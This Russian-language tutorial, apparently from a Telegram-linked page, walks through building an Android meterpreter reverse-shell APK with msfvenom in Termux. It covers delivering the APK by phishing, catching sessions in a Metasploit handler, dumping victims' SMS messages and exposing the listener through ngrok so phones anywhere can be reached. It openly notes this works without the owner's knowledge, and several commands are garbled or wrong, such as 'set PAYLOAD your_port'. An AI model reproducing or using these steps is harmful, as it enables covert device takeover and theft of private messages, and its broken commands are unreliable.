Удаленный доступ

Удаленный доступ

Security

Удаленный доступ — функция, дающая пользователю возможность подключаться к компьютеру с помощью другого устройства через интернет практически отовсюду. Пользователь работает с файлами и программами точно так же, как если бы он находился возле этого компьютера. Чаще всего полезные нагрузки используются для удаленного управления. Полезные данные отправляются с помощью социальной инженерии или фишинговых атак и другими способами. Как только вводится полезная нагрузка, начинается настоящая атака. Полезная нагрузка обеспечит обратное соединение. Чаще всего для создания полезных нагрузок используется платформа Metasploit. В платформе Metasploit существует три разных типа модулей полезной нагрузки:

  • Синглы
  • Этапы
  • Этапы.
Структура фишинг-атаки

Как мы можем использовать и получать удаленный доступ к устройству Android с помощью Metasploit. В Android нам нужен termux для запуска Metasploit. После установки termux нам необходимо установить фреймворк Metasploit.

Termux

После установки платформы Metasploit просто запустите pkg update && pkg upgrade, чтобы обновить пакеты. Затем введите termux-setup-storage, чтобы избежать проблем, связанных с разрешениями. termux-setup-storage - это команда, используемая в termux для предоставления разрешения на хранение. Это делается для того, чтобы сохранить полезную нагрузку внутри устройства или скопировать полезную нагрузку из termux на мобильный. теперь, если введете команду ls, вы увидите каталог с именем storage . ls означает перечислить текущий каталог и является командой, используемой в Linux для перечисления файлов внутри текущего каталога.

Основные команды:

  • $ pkg update && pkg upgrade
  • $ termux-setup-storage

Мы можем генерировать различные типы полезных нагрузок на основе требований. Сначала сгенерируем полезную нагрузку, чтобы получить доступ к устройству, подключенному к той же сети. одна и та же сеть относится к устройствам, подключенным друг к другу либо напрямую, либо через мобильную точку доступа (беспроводную сеть). давайте создадим полезную нагрузку с именем Geeks.apk.

Создание полезной нагрузки с помощью следующей команды msfvenom содержит стандартные параметры командной строки, используемые для создания полезной нагрузки. lhost означает ваш IP-адрес. просто введите ifconfig, чтобы узнать свой IP-адрес. lport будет номером порта, который вы можете ввести свой собственный номер порта.

Удаленный доступ в termux
  • $ msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.60.255 lport= 5321 R> Geeks.apk

После генерации полезной нагрузки скопируйте полезную нагрузку в свое хранилище, используя команду cp Geeks.хранилище apk. Теперь можно увидеть полезную нагрузку внутри хранилища, просто набрав cd storage и ls.

Теперь просто зайдите в хранилище, загрузите Geeks.apk и разрешите всё. Это обеспечит обратное подключение к хост-машине.

Посмотрим, как мы можем использовать это. Просто введите команду msfconsole. Это откроет новый интерфейс. затем введите следующие команды.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) >
 set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > 
set LHOST your_ip
msf6 exploit(multi/handler) >
 set PAYLOAD your_port
msf6 exploit(multi/handler) >
 exploit

Примечание: Введите lhost и lport то, что вы ввели при создании полезной нагрузки.

Теперь у нас сессия meterpreter. сеанс meterpreter - это не что иное, как обратное соединение. вы можете ввести справку, если хотите знать, что мы можем сделать с этим сеансом.

вы можете сделать много вещей, используя эту полезную нагрузку. Сейчас попробуем получать сообщения с устройства пользователя, для этого вам следует ввести dump_sms $HOME. dump_sms относится к команде для отправки всех SMS с устройства пользователя на наше устройство, а $HOME относится к месту хранения SMS. Мы можем переместить этот файл SMS из домашнего каталога в наше хранилище, используя команду:

$ mv sms_file_name storage
$ cd storage
$ mv sms_file-name downlods

Теперь можно легко читать все сообщения из загрузок:

Удаленный доступ приведет к потере конфиденциальности. Злоумышленник может делать все, что захочет. Но это на локальном хостинге.

Теперь посмотрим, как можно использовать устройство где-нибудь по всему миру. Для этого, беспроводного, мы должны загрузить ngrok. Поскольку мы используем WAN (беспроводную сеть). загрузите ngrok для Linux с веб-сайта ngrok. В termux введите следующую команду:

$ cd storage 
//refers to change directory from home to storage.
$ cd downloads 
//refers to changing the directory from storage to downloads.
$ mv ngrok $HOME 
//move ngrok from downloads to the home directory.
$ chmod +x ngrok      
//providing permission

В большинстве случаев ngrok не запускается в обычной среде. поэтому необходимо загрузить ubuntu или любую внешнюю ОС. Вы можете легко загрузить ubuntu.

После успешной установки ngrok зарегистрируйтесь в ngrok и подтвердите свой токен авторизации, выполнив команду. вы можете найти свой токен авторизации, как только войдете в ngrok.

$ ./ngrok config add-authtoken <token>

Теперь мы должны запустить TCP-сервер для переадресации портов. Для запуска TCP-сервера используйте следующую команду.

$ ./ngrok tcp 5431

Создание полезной нагрузки аналогично предыдущему, но lhost и lport должны быть изменены в соответствии с ngrok. В приведенном выше случае LHOST будет 6.tcp.ngrok.ввод-вывод и LPORT будут равны 16960. Это будет отличаться каждый раз, когда мы запускаем TCP-сервер с использованием ngrok. ngrok должен активировать другой сеанс, чтобы установить соединение.

$ msfvenom -p android/meterpreter/
reverse_tcp lhost=6.tcp.ngrok.io
 lport=16960 R> Geeks.apk

Как и в предыдущем, переместите полезную нагрузку из домашнего каталога в загрузочный. Теперь полезная нагрузка должна быть отправлена на устройство пользователя. После успешной установки полезной нагрузки на устройство пользователя запустите msfconsle, чтобы получить сеанс интерпретатора. Для этого используйте следующие команды.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) 
> set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) 
> set LHOST 0.0.0.0
msf6 exploit(multi/handler) 
> set PAYLOAD your_port (in my case it is 5544)
msf6 exploit(multi/handler) 
> exploit

Теперь, используя это, мы получаем доступ к устройству пользователя. Мы можем многое сделать без ведома вот как работает удаленный доступ. Существует множество способов, с помощью которых мы можем получить доступ к удаленному устройству. Обычно бэкдоры создаются для того, чтобы оставаться внутри устройств пользователя. полезная нагрузка - это тип бэкдора, через который мы использовали целевое устройство.

⚡️ Канал - ссылка

📺 YouTube - ссылка

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org